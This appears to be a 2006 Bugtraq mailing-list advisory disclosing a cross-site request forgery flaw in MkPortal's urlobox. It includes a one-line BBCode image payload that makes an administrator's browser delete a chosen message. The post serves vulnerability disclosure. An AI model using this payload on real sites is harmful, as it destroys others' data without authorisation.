[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

MkPortal Urlobox Cross Site Request Forgery

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MkPortal Urlobox Cross Site Request Forgery
From: info@xxxxxxxxxxx
Date: 19 Dec 2006 22:27:27 -0000

MkPortal Urlobox Cross Site Request Forgery

Discovered by: Demential
Web: http://www.burnhead.it
E-mail: info@xxxxxxxxxxx
Mkportal website: http://www.mkportal.it

posting [img]?ind=urlobox&op=delete&idurlo=X[/img] in MkPortal urlobox
where X is an ID of a message,
when administrator opens urlobox page
message X will be erased.

Prev by Date: Multiple Bugs in MINI WEB SHOP
Next by Date: RE: Cisco not honoring update promises?
Previous by thread: Multiple Bugs in MINI WEB SHOP
Next by thread: Re: MkPortal Urlobox Cross Site Request Forgery
Index(es):
- Date
- Thread